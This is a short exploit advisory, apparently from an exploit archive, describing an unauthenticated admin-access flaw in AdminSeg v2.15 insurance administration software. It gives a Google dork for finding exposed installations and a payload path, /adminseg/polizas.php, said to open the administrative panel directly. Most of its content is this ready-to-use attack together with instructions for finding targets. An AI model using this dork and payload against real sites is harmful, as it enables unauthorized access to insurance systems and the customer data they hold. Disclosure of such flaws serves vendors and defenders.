AdminSeg version 2.15 suffers from an insecure direct object reference that allows users to access the administrative interface.
2b5dd618f0754b260f9f8fb74ddf6f7aa6bde6279ed5f928ae9d8bfba55afc1a====================================================================================================================================
| # Title : AdminSeg v2.15 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(64-bit) |
| # Vendor : https://www.arwebs.net/producto/insurance-administration-software.html |
| # Dork : AdminSeg v2.15 |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] by using this payload you can access directly at admin panel .
[+] payload : /adminseg/polizas.php
[+] https://www.127.0.0.1/v2.15/adminseg/polizas.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================